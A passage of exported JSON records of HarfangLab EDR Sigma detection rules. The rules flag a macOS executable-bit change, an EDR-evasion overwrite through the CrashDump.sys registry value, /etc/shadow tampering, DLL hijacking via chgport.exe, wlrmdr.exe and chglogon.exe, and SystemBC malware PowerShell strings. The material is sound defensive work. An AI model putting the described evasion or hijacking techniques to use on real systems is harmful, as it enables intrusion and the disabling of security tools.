'/Users/*/Applications/'\n - '/Users/*/Library/'\n\n exclusion_cisco:\n ProcessParentCommandLine|startswith:\n - '/bin/bash /opt/cisco/secureclient/temp/downloader/vpndownloader.sh'\n - '/bin/bash /opt/cisco/anyconnect/temp/downloader/vpndownloader.sh'\n\n exclusion_cyberwatch:\n ProcessParentCommandLine: 'find /etc/cyberwatch-agent/ -type d -exec chmod 750 {} ;'\n\n exclusion_homebrew:\n ProcessAncestors|contains: '|/opt/homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby|'\n\n exclusion_batchmod:\n ProcessParentImage: '/Volumes/Rescue HD/Outils/Utilitaires/BatChmod*/BatChmod.app/Contents/MacOS/BatChmod'\n\n exclusion_munki:\n ProcessParentImage: '/usr/local/munki/Python.framework/Versions/*/Resources/Python.app/Contents/MacOS/Python'\n\n exclusion_node:\n ProcessAncestors|contains: '/.nvm/versions/node/v*/bin/node|'\n\n exclusion_claude:\n ProcessGrandparentCommandLine:\n - 'claude'\n - 'node /Users/*/.nvm/versions/node/v*/bin/claude'\n - '*/.vscode/extensions/anthropic.claude-code-*-darwin-arm64/resources/native-binary/claude *'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "05e6ac9c-7eac-44f4-a137-10196a85ae1b",
"rule_name": "Suspicious Binary Made Executable",
"rule_description": "Detects an attribute change on a file to make it executable in an uncommon directory.\nAdversaries may set the execute bit on a file before executing it.\nIt is recommended to check that the new executable file is harmless and to look for other suspicious behavior from the process modifying the file.\n",
"rule_creation_date": "2024-07-30",
"rule_modified_date": "2025-11-17",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1222.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "05ef230b-2d48-4e49-82a9-20e1fce73c9e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085767Z",
"creation_date": "2026-03-23T11:45:34.085769Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085774Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://x.com/sixtyvividtails/status/1888872344032100372?t=duYsOiMz6Df4LkTL2f20fg",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_executable_file_overwritten_using_crashdump.yml",
"content": "title: Executable File Overwritten using CrashDump.sys\nid: 05ef230b-2d48-4e49-82a9-20e1fce73c9e\ndescription: |\n Detects suspicious modification of the 'DedicatedDumpFile' registry value with a string ending with an executable or driver file extension.\n By modifying this value, the 'CrashDump.sys' driver will overwrite the file at next boot.\n Threat actors can use this technique in order to overwrite an executable that belongs to an EDR or AV to evade defenses.\n It is recommended to investigate the process that set the registry value as well as the added file path for suspicious content or actions.\nreferences:\n - https://x.com/sixtyvividtails/status/1888872344032100372?t=duYsOiMz6Df4LkTL2f20fg\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/02/11\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\CrashControl\\DedicatedDumpFile'\n Details|endswith:\n - '.exe'\n - '.sys'\n\n exclusion_citrix:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Details|endswith: '\\dedicateddumpfile.sys'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "05ef230b-2d48-4e49-82a9-20e1fce73c9e",
"rule_name": "Executable File Overwritten using CrashDump.sys",
"rule_description": "Detects suspicious modification of the 'DedicatedDumpFile' registry value with a string ending with an executable or driver file extension.\nBy modifying this value, the 'CrashDump.sys' driver will overwrite the file at next boot.\nThreat actors can use this technique in order to overwrite an executable that belongs to an EDR or AV to evade defenses.\nIt is recommended to investigate the process that set the registry value as well as the added file path for suspicious content or actions.\n",
"rule_creation_date": "2025-02-11",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "06168646-4339-42be-bcf4-a8f6ef23f53d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622141Z",
"creation_date": "2026-03-23T11:45:34.622143Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622148Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md",
"https://attack.mitre.org/techniques/T1003/008/",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1003_008_etc_shadow_modified.yml",
"content": "title: File /etc/shadow Modified\nid: 06168646-4339-42be-bcf4-a8f6ef23f53d\ndescription: |\n Detects a suspicious attempt to modify /etc/shadow.\n This file contains the encrypted passwords of all the accounts on the system and can be modified to change the password of a user.\n It is recommended to ensure that both the process modifying this file and the user that requested the modification of a user's password are legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md\n - https://attack.mitre.org/techniques/T1003/008/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2022/11/16\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.008\n - attack.t1078\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/shadow'\n - TargetPath: '/etc/shadow'\n\n filter_access_old:\n Kind: 'access'\n Permissions: 'read'\n\n filter_access_new:\n Kind:\n - 'read'\n - 'chmod'\n - 'chown'\n\n exclusion_common:\n ProcessImage:\n - '/lib/systemd/systemd'\n - '/usr/lib/systemd/systemd'\n - '/usr/bin/sudo'\n - '/usr/bin/su'\n - '/usr/sbin/sshd'\n - '/usr/sbin/cron'\n - '/usr/sbin/unix_chkpwd'\n - '*/accountsservice/accounts-daemon'\n - '/usr/bin/passwd'\n - '/usr/sbin/usermod'\n - '/usr/sbin/useradd'\n - '/usr/sbin/userdel'\n - '/usr/bin/chage'\n - '/kaniko/executor'\n - '/usr/sbin/chpasswd'\n - '/bin/chmod'\n - '/bin/adduser'\n - '/usr/bin/podman'\n - '/usr/bin/rootlesskit'\n - '/usr/sbin/pwconv'\n - '/usr/bin/chsh'\n - '/usr/bin/systemd-sysusers'\n - '/usr/lib/gdm3/gdm-session-worker'\n - '/usr/lib/snapd/snap-update-ns'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n 
exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_cmp:\n ProcessCurrentDirectory|startswith: '/var/backups/'\n ProcessImage|endswith: '/cmp'\n ProcessParentName: 'passwd'\n ProcessGrandparentImage|endswith: '/run-parts'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - 
'/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_containerd:\n ProcessGrandparentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n\n exclusion_busybox_adduser:\n ProcessImage: '/bin/busybox'\n ProcessCommandLine|startswith: 'adduser '\n\n exclusion_docker:\n ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - '/nix/store/*-docker-containerd-*/bin/containerd'\n\n exclusion_docker2:\n ProcessImage: '*/bin/dockerd'\n ProcessCommandLine: 'docker-applyLayer *'\n\n exclusion_passwd_busybox:\n ProcessImage: '/bin/busybox'\n ProcessCommandLine|contains:\n - 'passwd '\n - 'chown '\n - 'chpasswd '\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_buildah1:\n ProcessCommandLine|startswith: 'storage-applyLayer'\n ProcessParentImage: '/usr/bin/buildah'\n\n exclusion_buildah2:\n - ProcessCommandLine|startswith: 'buildah-in-a-user-namespace'\n - ProcessGrandparentCommandLine|startswith:\n - 'buildah from'\n - 'buildah build'\n - 'buildah commit'\n - ProcessParentCommandLine|startswith:\n - 'buildah from'\n - 'buildah build'\n - 'buildah commit'\n\n exclusion_salt_minion:\n - 
ProcessCommandLine:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n - ProcessParentCommandLine|startswith:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n - ProcessGrandparentCommandLine:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n\n exclusion_snap:\n ProcessImage:\n - '/snap/snapd/??/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/???/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/????/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/?????/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/??????/usr/lib/snapd/snap-update-ns'\n ProcessCommandLine|startswith: 'snap-update-ns'\n\n exclusion_nixos:\n ProcessGrandparentImage: '/nix/store/*-switch-to-configuration-*/bin/switch-to-configuration'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "06168646-4339-42be-bcf4-a8f6ef23f53d",
"rule_name": "File /etc/shadow Modified",
"rule_description": "Detects a suspicious attempt to modify /etc/shadow.\nThis file contains the encrypted passwords of all the accounts on the system and can be modified to change the password of a user.\nIt is recommended to ensure that both the process modifying this file and the user that requested the modification of a user's password are legitimate.\n",
"rule_creation_date": "2022-11-16",
"rule_modified_date": "2026-01-21",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.008",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "063e3a72-3dc5-411b-8f95-7a288514f8e5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082122Z",
"creation_date": "2026-03-23T11:45:34.082124Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082129Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_chgport.yml",
"content": "title: DLL Hijacking via chgport.exe\nid: 063e3a72-3dc5-411b-8f95-7a288514f8e5\ndescription: |\n Detects potential Windows DLL Hijacking via chgport.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chgport.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "063e3a72-3dc5-411b-8f95-7a288514f8e5",
"rule_name": "DLL Hijacking via chgport.exe",
"rule_description": "Detects potential Windows DLL Hijacking via chgport.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "065c4be3-1c64-4884-8239-a03e9bd028e7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602221Z",
"creation_date": "2026-03-23T11:45:34.602224Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602232Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wlrmdr.yml",
"content": "title: DLL Hijacking via wlrmdr.exe\nid: 065c4be3-1c64-4884-8239-a03e9bd028e7\ndescription: |\n Detects potential Windows DLL Hijacking via wlrmdr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wlrmdr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "065c4be3-1c64-4884-8239-a03e9bd028e7",
"rule_name": "DLL Hijacking via wlrmdr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wlrmdr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "06851538-293b-454e-ba25-02a9d4300ca4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609078Z",
"creation_date": "2026-03-23T11:45:34.609082Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609090Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c",
"https://twitter.com/malmoeb/status/1571985877424816130",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_systembc_powershell_execution.yml",
"content": "title: SystemBC PowerShell Execution\nid: 06851538-293b-454e-ba25-02a9d4300ca4\ndescription: |\n Detects the execution of the PowerShell version of SystemBC's launcher.\n SystemBC is a Malware-as-a-Service framework involved in numerous ransomware attacks.\n It is recommended to investigate all the PowerShell commands associated with the process.\n It is also recommended to check the process tree for suspicious activities.\nreferences:\n - https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c\n - https://twitter.com/malmoeb/status/1571985877424816130\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/09/27\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Malware.SystemBC\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains|all:\n - \"For ($*=0; $* -ne 50; $*++) { $*[$*] =* $* }\"\n - '[string]$domain = \"{0}.{1}.{2}.{3}\" -f $a, $b, $c, $d'\n - '[void]$ps.AddParameter(\"Rc4_crypt\", $*)'\n - '[void]$ps.AddParameter(\"xordata_\", $*)'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "06851538-293b-454e-ba25-02a9d4300ca4",
"rule_name": "SystemBC PowerShell Execution",
"rule_description": "Detects the execution of the PowerShell version of SystemBC's launcher.\nSystemBC is a Malware-as-a-Service framework involved in numerous ransomware attacks.\nIt is recommended to investigate all the PowerShell commands associated with the process.\nIt is also recommended to check the process tree for suspicious activities.\n",
"rule_creation_date": "2022-09-27",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1071"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "068ce414-d762-41fa-88fd-5e0df21bb756",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081159Z",
"creation_date": "2026-03-23T11:45:34.081161Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081166Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_chglogon.yml",
"content": "title: DLL Hijacking via chglogon.exe\nid: 068ce414-d762-41fa-88fd-5e0df21bb756\ndescription: |\n Detects potential Windows DLL Hijacking via chglogon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chglogon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\REGAPI.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "068ce414-d762-41fa-88fd-5e0df21bb756",
